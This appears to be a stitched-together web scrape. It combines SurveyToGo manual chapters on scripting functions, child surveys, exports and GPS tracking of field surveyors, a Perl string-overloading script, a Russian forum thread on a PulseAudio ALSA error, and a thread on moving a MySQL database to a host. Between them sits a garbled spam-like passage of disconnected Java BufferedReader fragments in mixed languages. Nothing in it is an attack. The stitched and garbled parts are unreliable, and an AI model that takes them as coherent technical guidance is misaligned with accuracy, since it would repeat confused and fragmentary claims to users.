(true/false), and shows\hides the given answer\topic. Input: Gets 3 Parameters 1st Parameter: The Target Question Index. 2nd Parameter: The Target Answer\Topic Index. 3rd Parameter: A Boolean value. (‘true’ for showing – ‘false’ for hiding) Output: Example of How to write: SetAnswerVisible(CurrQues,2,false); SetTopicVisible(CurrQues,4, false); AnswerChoice: Explanation: This function gets a target question index of a ‘Single-Choice-Grid’ question only, and a topic index. it returns the index of the selected answer in the given topic. Input: Gets 2 Parameters 1st Parameter: The Target Question Index. 2nd Parameter: The Target Topic Index. Output: returns an index of the selected answer in the given topic within the given multi-topic question. Example of How to write: AnswerChoice(CurrQues,3); AnswerChoice(1,2); NumOfSelectedChoices: Explanation: This function gets a target question index of a multi-selection question only, and returns the number of selected answers. Input: Gets 1 Parameters 1st Parameter: The Target Question Index. Output: returns the number of selected answers. Example of How to write: NumOfSelectedChoices(CurrQues); GetTopicCount: Explanation: This function gets a target question index of a Single-Choice Grid question only, and returns the number of topics. Input: Gets 1 Parameters 1st Parameter: The Target Question Index. Output: returns the number of topics. Example of How to write: GetTopicCount(CurrQues); AnswerIter: Explanation: This function gets a target question index of questions that are within a loop of only single choice questions such as: (Single-Choice, Numeric, Open Ended, Scale, Expression) and an iteration index. It returns the answer of the target question in the given Iteration Index. Input: Gets 2 Parameters 1st Parameter: The Target Question Index. 2nd Parameter: The Specific Iteration Index. Output: Returns its answer in the given iteration index within the loop. Example of How to write: AnswerIter (CurrQues, 3); AnswerIter (CurrQues,IterationIndex); *NOTE:IterationIndex Represents the current iteration when running within a loop, so it’s value is set according to the iteration which is currently running. ContainsIter: Explanation: This function gets a target question index of questions that are within a loop of only multi-selection question, an answer index and an iteration index. It checks if the given answer was selected in the target question within the given Iteration Index. Input: Gets 2 Parameters 1st Parameter: The Target Question Index. 2nd Parameter: The Specific Iteration Index. 3rd Parameter: The Specific Iteration Index. Output: returns ‘True’ if the given answer was selected in the given iteration – returns ‘False’ if the given answer was not selected in the given iteration index. Example of How to write: ContainsIter(CurrQues, 3,7); ContainsIter (CurrQues,2,IterationIndex); *NOTE:IterationIndex Represents the current iteration when running within a loop, so it’s value is set according to the iteration which is currently running. Random(): Explanation: This function gets an integer and returns a random number between the 0 and the integer number given minus 1. Input: Gets 1 Parameter. 1st Parameter: Maximum number. (Please note that the number generated is between zero till a number that is 1 less than the maximum number given) Output: returns a random integer within the given range. Example of How to write: Random(5); Random(732); SelectedAnswerText(): Explanation: This function gets a target question index and a Boolean and returns a text string with all the answers chosen in the given question index, separated with a comma. Input: Gets 2 Parameters 1st Parameter: The Target Question Index. 2nd Parameter: ‘true’ for including any ‘Other Specify’ text, ‘false’ for not including any ‘Other Specify’ text. Output: returns a text string with all the answers chosen in the given question index, separated with a comma. Example of How to write: SelectedAnswerText(12,true); SelectedAnswerText(CurrQues,false); SetAnswer(): Explanation: This function gets a target question index and a target answer index and sets this answer is chosen in the given question index Input: Gets 2 Parameters 1st Parameter: The Target Question Index. 2nd Parameter: The Target Answer Index Output: doesn’t return anything, just sets the answer given. Example of How to write: SetAnswer(5,2); SetAnswer(CurrQues,8); Child Survey Chapter May 23, 2012 2 comments Back to Table Of Contents Back to Chapter 8 – Start/End Scripts About child surveys SurveyToGo enables you to start a survey from within another survey. This feature can be used for a bunch of different purposes such as: • Filling out surveys in response to conditions. For example: a survey for a retail store, that requires a different survey if the store was close. • Filling out surveys in response to events in the field. For example: general medical device survey, where if while filling out the general questions, the patient suddenly reacts you need to fill out a survey about his/her reaction then continue back to filling the general survey. • Simple loops. Each child survey is rendered as a menu option on the device allowing for quick ad-hoc filling of child surveys. How to make it happen? In order to configure child surveys for a father survey, you just need to specify for the master survey which survey(s) are its child surveys. To accomplish this, do the following: 1. Open the main survey. 2. Click the “Edit Child Surveys” link on the advanced tab of the survey node: 3. Click the “+” button to add a new child survey, then fill out the “Button Text” text. This text will be shown on the menu of the device: Then, click the “…” button to select the actual child survey from your existing surveys. Please note you can select any survey you want, and you can have a survey be a child survey of more then 1 parent. 4. Click the “+” button to add more surveys or the “OK” button to finish. 5. That’s it. You can now deploy the survey to the device and on the device you will see a menu Working with child surveys on the device Now, on the device when running the survey you will see a menu named “More”: Clicking on this menu will bring up the ability to add or edit child surveys: You can then select the relevant child survey from the list of surveys. This will start a new run of the child survey, after which you will return to the current survey. To edit surveys you have already conducted tap the “Edit Additional Surveys” menu option, and then select the relevant survey. How to change the “Data” field of child surveys for later editing? When you choose to edit additional surveys from the device by clicking the option: You will see a screen that lists out the various child surveys you have filled out. For example: If you wish executing a child survey automatically, without needing the surveyor to do it manually, you can write the following script in your desired location in your questionnaire: ChildMgr.StartChildSurvey(“THE NAME OF YOUR CHILD SURVEY”); Column Description Name Name of the child survey ID Internal ID Time The time when you have started the child survey run Data Additional data that can be associated with the child survey run. The “Data” field can be used to specify whatever data you might want to associate with the child survey run. This value would populate the SubjectData variable.  To set it’s value from within the survey you can use SubjectData = “this is a value”; The SubjectData is a variable that can later be presented as additional attribute of the survey on the Operations Console and assist with identifying a specific survey run. An example can be a survey of a household that then calls for a child survey for each member of the family. You can call the child survey with the family member name  by entering ChildMgr.StartChildSurvey(<Member Name>); or you can set it from within the child survey if the surveyor codes the name as one of the child survey questions. It will then be presented in the Operations Console and in the Additional Info column of the survey result in the surveyor’s device. Please note you can interact with the “SubjectData” variable anywhere in the questionnaire, including Expression questions, start/end question scripts etc.. ‘Communication’ between a Parent survey and a Child survey  The most efficient way to perform information exchange between child and parent survey is by using the Parent object from within the child survey. You can call any SurveyToGo function by using Parent. for example Parent.Answer(1) would return the value of question 1 in the parent survey. Parent.SetAnswer(1, 2) would set the value of question 1 in the the Parenet survey to 1.  Go To Chapter 10 – Quota Management Back to Table Of Contents Visit us at: http://www.dooblo.net Categories: Studio Manual Chapter 4 – Capturing Multi-Media May 22, 2012 Leave a comment Back to Table Of Contents Back to  Chapter 3 – Managing a Tablet Survey About attaching files to the running surveys  SurveyToGo is enabled by default to accept any file that is created during the survey as an attachment to the running survey result. Because of this, any pictures that you take during the survey or any sounds that you record during the survey are automatically attached to the current survey result and will be sent along with the result to the server. Creating A Multimedia question Multimedia questions are types of questions which allow you to choose whether it will record Picture, Sound or Video. Now, once the survey is running, you can capture the multimedia you chose by using the action button that will be displayed in the question. 1. Pictures: 2. Sounds: 3. Videos: The Clear button will clear the latest multimedia file captured. Of course, you can capture multiple files at once: Any multimedia that you capture while you are in a survey is automatically bound to that survey result. Continue running the survey normally and once you synchronize the results back to the server, the pictures are synced with the results. You can view attachments of specific results in the operations console. Enter a result, and go to its answer’s tab, there you can see their attachments and the question the attachment was captured. You can also view the attachment through the link to our server and save a local copy. How to export the attached pictures/sounds Attachments can be exported through the regular exporting wizard while exporting the results of a survey. There are two options for exporting the attachments: 1. ‘Include attachment Results’: If you specify this option and select a folder location, any picture attachment that was included in the results will be placed in this folder. The name of the picture will be according to the relevant SubjectID field in the results file. 1. ‘Include attachment list’ : If checked, you can choose a csv file that will receive a list of links to the various pictures that were included in the results. This is useful if you need links to the attachments instead of the actual pictures. Both options can be selected together. In the last screen of the export wizard, you can specify the folder for the attachments and choose your attachment exporting configuration. Option Description Export Data File This is the file name that will be filled with all the results according to your selection Include result attachments If you specify this option and select a folder location, any picture attachment that was included in the results will be placed in this folder. The name of the picture will be according to the relevant SubjectID field in the results file. Include attachment list If checked, you can choose a csv file that will receive a list of links to the various pictures that were included in the results. This is useful if you need links to the attachments instead of the actual pictures. Go To Chapter 5 – Showing pictures & media on the tablet Back to Table Of Contents Visit us at:    http://www.dooblo.net Categories: Studio Manual Chapter 6 – Exporting & Printing May 14, 2012 2 comments Back to Table Of Contents Back to  Chapter 5 – Showing pictures & media on the PDA About Exporting & Printing SurveyToGo enables you to export the data of a survey at any point, to a number of different applications & formats. Furthermore, additional export providers can be written easily to support additional formats. Currently, the supported formats include MS Excel, MS Access, SPSS & XML. When exporting, you have complete control on the order of the exported columns, enabling you to separate the way the survey is presented from the way the data is to be exported. The Export Wizard Whenever you wish to export the data of the survey, you simply double click on the “Collected Data” Node in the relevant project: On the screen that opens you have the choice of exporting the interviews or the actual survey structure. Choose the “Survey Results” option and select the relevant survey, then click “Export”: Please note only active surveys will be displayed in the list. If your survey is marked as “Draft” or “Closed” then it will not be shown. If you need to export results of closed surveys, simply change their mode back to production or test. Survey select screen In this screen, simply select the survey who’s results you would like to export and click Next: Export provider screen Simply select the desired export provider and click the Next button. Export options screen To see a list of all the fields and their descriptions please click here: List of all fields and descriptions When done you can either click the columns order tab to change the columns order settings, or click Next to continue. Columns Order screen The columns order screen allows you to define the exact order of the columns you would like to have when exporting the survey results. You can choose to export all or only a subset of the columns available, or even export a column more then once. Both the left list and the right list support multiple selections (by using the Shift and or Control keys) and are completely sort able by any column you desire. When you are done configuring the order and number of columns you need to export, simply click the options tab or click Next to continue the export process. Note: export settings are saved on your computer for the when you need to export the same survey again. Option Description Left list – Source columns Contains all the available columns. You can select one or more columns from this list to move to the output columns list. Internal columns, like the ‘duration’ column etc have a yellow background while survey specific columns have a white background. The list supports multiple selections & sorting. To sort, simply click the column of the list you would like to sort by. Right list – output columns Contains all the columns that will be included in the output export file. The order of the columns is the actual order of the exported file. To change the order of the columns you can press the up/down arrows. To create a copy of a column, right click that column: Up/down buttons Control the actual order of the columns. You can select either one or more columns and press the up down buttons to move these columns up or down. Left/right buttons Control the movement of columns between the left and right list. Options screen The options screen allows you to specify some general options regarding the exported file. When you are done, simply click the Next button to continue. Option Description Include Filtered Out subjects Subjects who participate in your survey can be filtered out from the survey due to certain conditions. If checked filtered out subjects will also be included in the exported file, and an additional column – “Filter” is added to the exported data. The “Filter” column contains the index of the question the subject was filtered at. Export only results submitted between… and … Enables you to specify a date range for the exported results. If specified, only results from the specified range are included in the export. Swap rows and cols If checked, the results are exported so that each subject is a column, and each question is a row, instead of the regular format where each subject is a row and each question is a column. File name selection screen The file name selection screen allows you to enter the name of the output file name. When you are done, click the finish button to continue. Option Description Export Data File This is the file name that will be filled with all the results according to your selection Include result attachments If you specify this option and select a folder location, any picture attachment that was included in the results will be placed in this folder. The name of the picture will be according to the relevant SubjectID field in the results file. Include attachment list If checked, you can choose a csv file that will receive a list of links to the various pictures that were included in the results. This is useful if you need links to the attachments instead of the actual pictures. After you click the finish button, you will see the following screen: Answer Yes to open the exported file using its associated application, or no to continue without opening the external application. Exporting the survey (not the results) Sometimes there comes a need to export the actual survey structure. This can include backup purposes, moving a survey from one SurveyToGo server to another one and more. To export a survey to XML, simply choose “Survey > Export” then choose Export Survey: Choose the survey you would like to export, and click Next: Choose the default SurveyToGo export provider and click Next: Then choose a file name and click the finish button. The survey will be saved to the path you indicated. Printing Printing a survey can be very useful for both keeping a hard copy version of the survey & for sending to clients & team members for review. You can both directly print a survey or perform a print preview. Direct Printing To directly print a survey in SurveyToGo, choose the “Survey > Print” menu option: Then choose the printer you desire from the standard printer selection screen and press OK to print: Print Preview To preview a survey before printing, select the “Survey > Print Preview” menu option: Then the print preview screen will show, allowing you to preview the output before printing: Go To Chapter 7 – Rules Back to Table Of Contents Visit us at:   http://www.dooblo.net Categories: Studio Manual SurveyToGo – Built-In Functions Hand Book May 14, 2012 1 comment Overview SurveyToGo contains an enormous set of built-in functions ready to use. We have assembled all of them in one file – a useful handbook for scripting surveys. Please see this link for the download: http://www.dooblo.net/downloads/SurveyToGoCommands.zip It contains all the functions but in a more raw form. We are in the process of moving them from this file to a more elegant web manual. The beta version of the web manual is here: http://stg.dooblo.net/ULDocs – but it is only in beta so please expect things to be a bit weird with it. We strongly recommend having this, Very Handful! Visit us at: http://www.dooblo.net Chapter 19 – GPS Tracking January 26, 2012 1 comment Back to Table Of Contents Back to Chapter 18 – Multiple Languages & Translation About Viewing GPS Tracking in Survey To Go Studio SurveyToGo is enabled by default to use the GPS tracking feature of your devices without any pre-configuration needed. Now you can track your surveyor’s location, know their route of movement and follow the specific location where surveys were conducted. This feature gives field-managers and any other back-office teams a whole new aspect of benefits in organizing, managing and supervising your field team. GPS Functionality in SurveyToGo Where it is? On your SurveyToGo Studio software, on the left side, where the main tree of your organization is, you can notice that there is an expandable node called ‘GPS Tracking’. Show Latest Locations Node This node will allow you to see all latest surveyors’ locations tracked by the GPS feature in their devices. If you double click this node, you would get a window with the following menu: 1. This button will provide you with the map, showing the latest surveyor locations tracked. 2. You can define your search according to a specific user, specific group or all users at once. 3. Here you can define the time scale according to the time you want to track locations. From five days ago until two hours ago. 4. You can save the map provided in step 1 as a Google Earth file. After you click the ‘Get latest locations’ button, you would be provided with a map showing the latest locations tracked. • In the upper part you have a navigation bar, you can move by using the mouse as well. • If you float with the cursor above one of the location pins, you can see the specific user, time and date that this location was tracked. • In the bottom right corner, you can see the view scale of the map. • The map indicates street names and important locations name as well. Show Route Node This node will allow you to view specific routes that the surveyors did, according to the order of the locations tracked. If you double click this node, you would get the following menu. 1. Here you can choose the user to track its route, if you click the ‘Get User’s route’, it will provide you with a map indicating the users route. 2. Here you can define the time scale for viewing the route. After you click the ‘Get User’s route’ button, you would be provided with a map showing the route of the user chosen. • The red triangle sign indicates where the route has begun. • The red square sign indicates where the route has finished. • The small ‘S’ sign indicates a location where a survey has been conducted. • The green lines indicate the route of the user, following the locations tracks according to their order. • If you float with the cursor above any of these items, you would get the user, time and date that the item had been tracked. Viewing the GPS Tracking through the Operations Grid If you enter to the operations grid, you can choose a specific result and double click it: If you go under the ‘Map’ tab, you would be able to view the specific place where this result was conducted. • You can view this in Google Maps • You can copy the specific coordinates to your clipboards. • You can save this as a Google Earth file • If you float over the location pin with your cursor you would see the user, time, date, result number and survey name. Back to Table Of Contents Visit us at:  http://www.dooblo.net Categories: Studio Manual %d bloggers like this:
__label__pos
0.689667
Usando o bufferedreader Show us exactly how you are using nextLine() and we will surely have a solution faster.By posting your answer, you agree to the privacy policy and terms of service.The config file would be named conf.properties and then it would have in it. Using IntelliSense | Microsoft Docs BufferedReader - JUniversal According BufferedReader javadoc, In general, each read request made of a Reader causes a corresponding. OpenTop C++ class: BufferedReader - ElCel Technology The presentation will start after a short (15 second) video ad from one of our sponsors. Usando o Office 365 Personal e Home - mva.microsoft.com In looking at the Javadoc for the java.io package, we see a dizzying array of classes. Java Input and Output (I/O) - DePaul University What is a BufferedReader in Java, and how do we use it : Class BufferedReader ¿Escribir un programa en Java que lea una frase por el Serializability of a class is enabled by the class implementing the java.io.Serializable interface. [Java] package com.company; import java.io.BufferedReader The Java.io.BufferedReader class reads text from a character-input stream, buffering characters so as to provide for the efficient reading of characters, arrays, and. public class Par T private T a b public ParT a T b thisa a What is the use of BufferedReader in Java program? BufferedReader is used to support buffered reading operations. Java IO Tutorial - Java BufferedReader.readLine() Java FileWriter Class - Learn Java in simple and easy steps starting from basic to advanced concepts with examples including Java Syntax Object Oriented Language. What I mean is, you need to give us EXACTLY the code you are using with getLine().Ask Question. up vote 3 down vote favorite. 1. I think BufferedReader is better than scanner simply because it does what it says, it buffers.What you want to do is use nextLine for everything, and parse it later. Browse other questions tagged java or ask your own question.What is the difference between using Buffered reader class and Scanner. OmegaT - multiplatform CAT tool / Mailing Lists Most simple example of reading file line by line is using BufferedReader which provides method readLine. Legion T.I.: Outubro 2011 In this tutorial I set up 3 text files and write a program that implements the BufferedReader to read. FileInputStream fsdel = new FileInputStream("C:/Folder import java.io.BufferedReader; import java.io.IOException Java (programming language): What is the difference Como enviar parâmetros via post em java usando Java example to show how to read file with BufferedReader class.Read text from a character-input stream, buffering characters so as to provide for the efficient reading of characters.Enter a Brief Course Description: Introduction to programming. How to read until end of file (EOF) using BufferedReader in Java.Infinite area under curve without using derivatives and integrals.It seems you are using the Google Docs viewer, but you can easily use the API to get an HTML export of a document without the viewer, by.This tutorial explains Java IO streams Java.io.BufferedReader class in Java programs. Java.io.BufferedReader class reads text from a character-input stream, buffering.
__label__pos
0.579505
LINUX.ORG.RU module-alsa-card.c: Failed to find a working profile.  , 0 1 #> /etc/init.d/udev restart * WARNING: you are stopping a sysinit service * Stopping udev ... [ ok ] * Starting udev ... [ ok ] * Populating /dev with existing devices through uevents ... [ ok ] * Waiting for uevents to be processed ... E: [pulseaudio] module-alsa-card.c: Failed to find a working profile. E: [pulseaudio] module.c: Failed to load module "module-alsa-card" (argument: "device_id="29" name="platform-thinkpad_acpi" card_name="alsa_card.platform-thinkpad_acpi" namereg_fail=false tsched=yes fixed_latency_range=no ignore_dB=no deferred_volume=yes card_properties="module-udev-detect.discovered=1""): initialization failed. E: [pulseaudio] module-alsa-card.c: Failed to find a working profile. E: [pulseaudio] module.c: Failed to load module "module-alsa-card" (argument: "device_id="29" name="platform-thinkpad_acpi" card_name="alsa_card.platform-thinkpad_acpi" namereg_fail=false tsched=yes fixed_latency_range=no ignore_dB=no deferred_volume=yes card_properties="module-udev-detect.discovered=1""): initialization failed. [ ok ] Зачем модуль стартует дважды? К какому пакету относится module-alsa-card.c? Что пересобрать? К какому пакету относится module-alsa-card.c? Что пересобрать? $ locate module-alsa-card /usr/lib32/pulse-1.1/modules/module-alsa-card.so $ equery b /usr/lib32/pulse-1.1/modules/module-alsa-card.so * Searching for /usr/lib32/pulse-1.1/modules/module-alsa-card.so ... app-emulation/emul-linux-x86-soundlibs-20120127 (/usr/lib32/pulse-1.1/modules/module-alsa-card.so) Всегда Ваш К.О. init_6 ★★★★★ () Ответ на: комментарий от garmonbozia В pavucontrol почему-то изменился дефолтный звуковой девайс. Выбрал нужный, звук появился. garmonbozia () Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.
__label__pos
0.77238
my $str = str::new(''); my $html = "$str"; print $html; # print $html->encode; # <encode this later> #### #!/usr/bin/perl use strict; use warnings; use 5.010; use Data::Dumper; $Data::Dumper::Sortkeys=1; my $str1 = str::new('foo'); my $str2 = str::new('bar'); my $good1 = "$str1 $str2"; my $good2; $good2 = $good1; my($good3, $good4); $good3 = "$str1 a"; $good4 = "a $str1"; my($bad1, $bad2, $bad3); $bad1 = "a $str1 a"; $bad2 = "$str1 $str2"; $bad3 = "a $str1 a $str2 a"; say Dumper { GOOD => [$good1, $good2, $good3], BAD => [$bad1, $bad2, $bad3] }; $bad1 = ''."a $str1 a"; $bad2 = ''."$str1 $str2"; $bad3 = ''."a $str1 a $str2 a"; say Dumper { BAD_GOOD => [$bad1, $bad2, $bad3] }; package str; use Data::Dumper; $Data::Dumper::Sortkeys=1; use strict; use warnings; use 5.010; use Scalar::Util 'reftype'; use overload ( '""' => \&stringify, '.' => \&concat, ); sub new { my($value) = @_; bless((ref $value ? $value : \$value), __PACKAGE__); } sub stringify { my($str) = @_; #say Dumper { stringify => \@_ }; if (reftype($str) eq 'ARRAY') { return join '', @$str; } else { $$str; } } sub concat { my($s1, $s2, $inverted) = @_; #say Dumper { concat => \@_ }; return new( $inverted ? [$s2, $s1] : [$s1, $s2] ); } 1; #### $VAR1 = { 'BAD' => [ 'a foo a', 'foo bar', 'a foo a bar a' ], 'GOOD' => [ bless( [ bless( [ bless( do{\(my $o = 'foo')}, 'str' ), ' ' ], 'str' ), bless( do{\(my $o = 'bar')}, 'str' ) ], 'str' ), $VAR1->{'GOOD'}[0], bless( [ $VAR1->{'GOOD'}[0][0][0], ' a' ], 'str' ) ] }; $VAR1 = { 'BAD_GOOD' => [ bless( [ '', bless( [ bless( [ 'a ', bless( do{\(my $o = 'foo')}, 'str' ) ], 'str' ), ' a' ], 'str' ) ], 'str' ), bless( [ '', bless( [ bless( [ $VAR1->{'BAD_GOOD'}[0][1][0][1], ' ' ], 'str' ), bless( do{\(my $o = 'bar')}, 'str' ) ], 'str' ) ], 'str' ), bless( [ '', bless( [ bless( [ bless( [ bless( [ 'a ', $VAR1->{'BAD_GOOD'}[0][1][0][1] ], 'str' ), ' a ' ], 'str' ), $VAR1->{'BAD_GOOD'}[1][1][1] ], 'str' ), ' a' ], 'str' ) ], 'str' ) ] };
__label__pos
0.978825
Skip to content prokls/cnf-analysis-py Folders and files NameName Last commit message Last commit date Latest commit   History 35 Commits                 Repository files navigation cnf-analysis-py Author: Lukas Prokop Date: June 2015 to August 2016 Version: 3.0.0 license:CC-0 cnf-analysis-py is a library to analyze DIMACS CNF files. Those files are commonly used to decode SAT problems and a few basic features of a CNF file might tell you something about the problem stated. This tool evaluates a list of features which are thoroughly described by the project and stores them in a JSON file. How To Use To install use pip3: $ pip3 install cnfanalysis Then the command line tool to analyze CNF files is available: $ echo "p cnf 3 2\n1 -3 0\n2 3 -1 0\n" > example.cnf $ cnf-analysis-py example.cnf File example.stats.json has been written. $ cat example.stats.json [ { "@cnfhash": "cnf2$7d16f8d71b7097a2f931936ae6d03d738117b2c6", "@filename": "example.cnf", "@md5sum": "04f6bf2c537242f15082867e66847bd7", "@sha1sum": "23dd9e64ae0fb4806661b49a31e7f5e692f2d045", "@timestamp": "2016-08-03T10:52:23.412694", "@version": "1.0.0", "featuring": { "clause_variables_sd_mean": 0.908248290463863, "clauses_count": 2, "clauses_length_largest": 3, "clauses_length_mean": 2.5, "clauses_length_median": 2.5, "clauses_length_sd": 0.5, "clauses_length_smallest": 2, "connected_literal_components_count": 3, "connected_variable_components_count": 1, "definite_clauses_count": 1, "existential_literals_count": 1, "existential_positive_literals_count": 1, "false_trivial": true, "goal_clauses_count": 0, "literals_count": 5, "literals_frequency_0_to_5": 1, "literals_frequency_50_to_55": 5, "literals_frequency_entropy": 2.5, "literals_frequency_largest": 0.5, "literals_frequency_mean": 0.4166666666666667, "literals_frequency_median": 0.5, "literals_frequency_sd": 0.18633899812498247, "literals_frequency_smallest": 0.0, "literals_occurence_one_count": 5, "nbclauses": 2, "nbvars": 3, "negative_literals_in_clause_largest": 1, "negative_literals_in_clause_mean": 1, "negative_literals_in_clause_smallest": 1, "negative_unit_clause_count": 0, "positive_literals_count": 3, "positive_literals_in_clause_largest": 2, "positive_literals_in_clause_mean": 1.5, "positive_literals_in_clause_median": 1.5, "positive_literals_in_clause_sd": 0.5, "positive_literals_in_clause_smallest": 1, "positive_negative_literals_in_clause_ratio_entropy": 0.8899750004807708, "positive_negative_literals_in_clause_ratio_mean": 0.5833333333333333, "positive_unit_clause_count": 0, "tautological_literals_count": 0, "true_trivial": true, "two_literals_clause_count": 1, "variables_frequency_50_to_55": 1, "variables_frequency_95_to_100": 2, "variables_frequency_entropy": 0.5, "variables_frequency_largest": 1.0, "variables_frequency_mean": 0.8333333333333334, "variables_frequency_median": 1.0, "variables_frequency_sd": 0.23570226039551584, "variables_frequency_smallest": 0.5, "variables_largest": 3, "variables_smallest": 1, "variables_used_count": 3 } } ] Performance cnf-analysis-py puts CNF files supplied as command line arguments into a process pool and uses processes in the number of CPUs available on your machine. You can however use -u to define the number of parallel processes. Also consider the remarks for memory. This sort of parallelism should be best suited for python and I retrieved the following runtime results (for SAT competition 2016 CNF files): • 3434 files (5.9 GB in total) in Agile took 23h 19min • esawn_uw3.debugged.cnf (1.4 GB) in app16 took 8 hours and 15 minutes • bench_573.smt2.cnf (1.6 MB) in Agile took 2min 14sec Be aware that the performance mainly depends on the features computed. Designated tool to compute a subset of features can be much faster, however none is provided with this implementation. I am using my Thinkpad x220t with 16GB RAM and an Intel Core i5-2520M CPU (2.50GHz) as reference system here. Memory Again, we consider SAT competition 2016 CNF files and besides Thinkpad x220t we also consider a desktop system with an Intel Core i7 CPU (2.8GHz) but only 4 GB RAM. In Agile CNF files have 1.7 MB average file size. 5 MB files take at most 50 MB (factor 10) to evaluate them. sin.c.75.smt2-cvc4.cnf (770 MB) in app16 even yielded a MemoryError in python on my Linux machine with only 4 GB. On my 16 GB machine it took 3 hours and 15 minutes. esawn_uw3.debugged.cnf used 8 GB RAM. Thrashing can dramatically reduce performance. Hence, if your entire memory is used, consider cancellation. Use units = total virtual memory / (avg file size * 10) to determine the recommended number of parallel units. Certainly this implementation is not very memory efficient. Dependencies It works with Python 3.4 or later. I tested it on linux x86_64. Package dependencies are listed in requirements.txt: • python_algorithms for a Union-Find implementation • cnfhash to compute the cnfhash Command line options --ignore c --ignore x Ignore any lines starting with "c" or "x". If none is specified "c" and "%" is ignored. --no-hashes skip hash computations --fullpath print full path, not basename DIMACS files DIMACS files are read by skipping any lines starting with characters from --ignore. The remaining content is parsed (header line with nbvars and nbclauses) and in the remaining line, integers are retrieved and passed over. Hence the parser yields a sequence of literals. Features Features are documented in my paper "Analyzing CNF benchmarks". Cheers, prokls About Analyze CNF benchmark files with python3 Resources Stars Watchers Forks Packages No packages published Languages
__label__pos
0.988048
Textures are inside when loading multipatch to CityEngine 531 2 Jump to solution 11-23-2020 05:20 AM AndresKasekamp New Contributor III I have a building which is texturised, but when I loaded into CityEngine, the textures seem to be inside the building for some reason. How can I fix this error or is the error due to the way the buildings were texturised in the first place?  Building in CityEngine: AndresKasekamp_0-1606137045444.pngAndresKasekamp_1-1606137093251.pngAndresKasekamp_2-1606137113856.png Building in ArcGIS Pro: AndresKasekamp_0-1606137420716.png     0 Kudos 1 Solution Accepted Solutions BrianWamsley Occasional Contributor III Simple answer first,  have you tried in the Shapes tab, the reverse normals option?   View solution in original post 2 Replies BrianWamsley Occasional Contributor III Simple answer first,  have you tried in the Shapes tab, the reverse normals option?   View solution in original post AndresKasekamp New Contributor III Thanks, it worked! 0 Kudos
__label__pos
0.707965
parallel map node in dtkComposer dtkComposer layer Since the beginning of the dtkComposer layer, the Map and Foreach nodes allow the user to apply the same sub-composition to an input container (Qt container, std::vector, dtkArray, etc .). We can for example read a bunch of files from a given directory, put the result in a QStringList and apply a treatment (sub-composition) to each of the files. Using the same technique we use for the remote execution of composition (serialization of the composition as XML, and use of a dtkComposerReader at the remote end), we are now able to add a parallel Map node. map node The idea is to start a qthread based dtkDistributedCommunicator in the parallel Map node, and send to each threads the XML serialization of it’s internal composition (the visual program inside the Map node). Each thread will run the composition on a given range of the input container, and will write the result in the output container. In the next toy example, we apply to a list of images a very basic set of filters (Gaussian and Normalize filters): alt text parallel map node implementation One of the limitation of the initial design of the composer was that even though the visual aspect (called the dtkComposerScene) was separated from the evaluation aspect (dtkComposerEvaluator), the Scene was used to build the evaluation graph used by the Evaluator from the XML (and the scene was also needed to write the XML). This was a real problem for the multithreaded implementation of the Map node, since each thread had no scene at all. We have now refactored completely the dtkComposerReader and dtkComposerWriter (used for the XML Serialization/Deserialization), and we are now able to use a dtkComposerEvaluator without any scene. In the next example, we now use the Parallel Map node instead of the Map. We can notice that it’s exactly the same composition, the user only needs to switch from the Map node to the ParallelMap one in order to use all the available cores of it’s computer. alt text Leave a Reply Your email address will not be published. Time limit is exhausted. Please reload the CAPTCHA.
__label__pos
0.74104
mysql question Discussion in 'OT Technology' started by Leb_CRX, Apr 8, 2004. 1. Leb_CRX Leb_CRX OT's resident terrorist Joined: Apr 22, 2001 Messages: 39,994 Likes Received: 0 Location: Ottawa, Canada ok say I am working on my own PC on a mySQL database, and I suddenly get a hosting account, whats the fastest way to transfer that over? do they allow me to SSH into it and load it that way? (I presume from a backup) or how exactly? does it depend on the hosting company I am with or how exactly? I need more info on this, probally a mad n00by question, but I never done this so :hs:   2. Slid. Slid. I'm a guy. Joined: Oct 25, 2001 Messages: 1,928 Likes Received: 0 Location: NH Well I'm guessing you're not using something like phpMyAdmin - which allows you great control over a mySQL database. If you don't already have it I'd *highly* recommend it for both you and your hosting account (most hosts ALREADY have this however). You want to use a mysqldump command found below: http://www.mysql.com/doc/en/mysqldump.html phpMyAdmin install instructions can be found here: http://www.aota.net/PHP_and_MySQL/phpmyadmin.php4 A mySQL dump will basically dump everything from a database into a text file that has all the INSERT and CREATE commands you need to run on the new server.   3. Leb_CRX Leb_CRX OT's resident terrorist Joined: Apr 22, 2001 Messages: 39,994 Likes Received: 0 Location: Ottawa, Canada Oh wow Slid, I didn't even know that (the dump has the inserts/create), I remember CyberBullets posting about that for me a while back when I was looking for a backup but I never opened the file and looked at it. as for phpMyAdmin, I am definitivally gonna give that a go, thanks! :)   4. Slid. Slid. I'm a guy. Joined: Oct 25, 2001 Messages: 1,928 Likes Received: 0 Location: NH 5. Leb_CRX Leb_CRX OT's resident terrorist Joined: Apr 22, 2001 Messages: 39,994 Likes Received: 0 Location: Ottawa, Canada another question, non-sql related, do hosts allow me to SSH into the server and make changes if needed?   6. CyberBullets CyberBullets I reach to the sky, and call out your name. If I c Joined: Nov 13, 2001 Messages: 11,865 Likes Received: 0 Location: BC, Canada/Stockholm, Sweden some hosts require you to verify who you are before they open up ssh to you. usually download a program called PuTTY and conenct using ur master username/password.   7. Leb_CRX Leb_CRX OT's resident terrorist Joined: Apr 22, 2001 Messages: 39,994 Likes Received: 0 Location: Ottawa, Canada I know putty I use it to login to my linux server, among other things I just wasen't sure if they allowed access through it, but I guess that's the answer   8. Ximian Ximian New Member Joined: Mar 20, 2004 Messages: 1,860 Likes Received: 0 Location: DCA Why don't you ask them to be sure considering everyone has a different security policy. Generally speaking, if you have access to it, you're allowed to use it, just don't abuse it.   Share This Page
__label__pos
0.953357
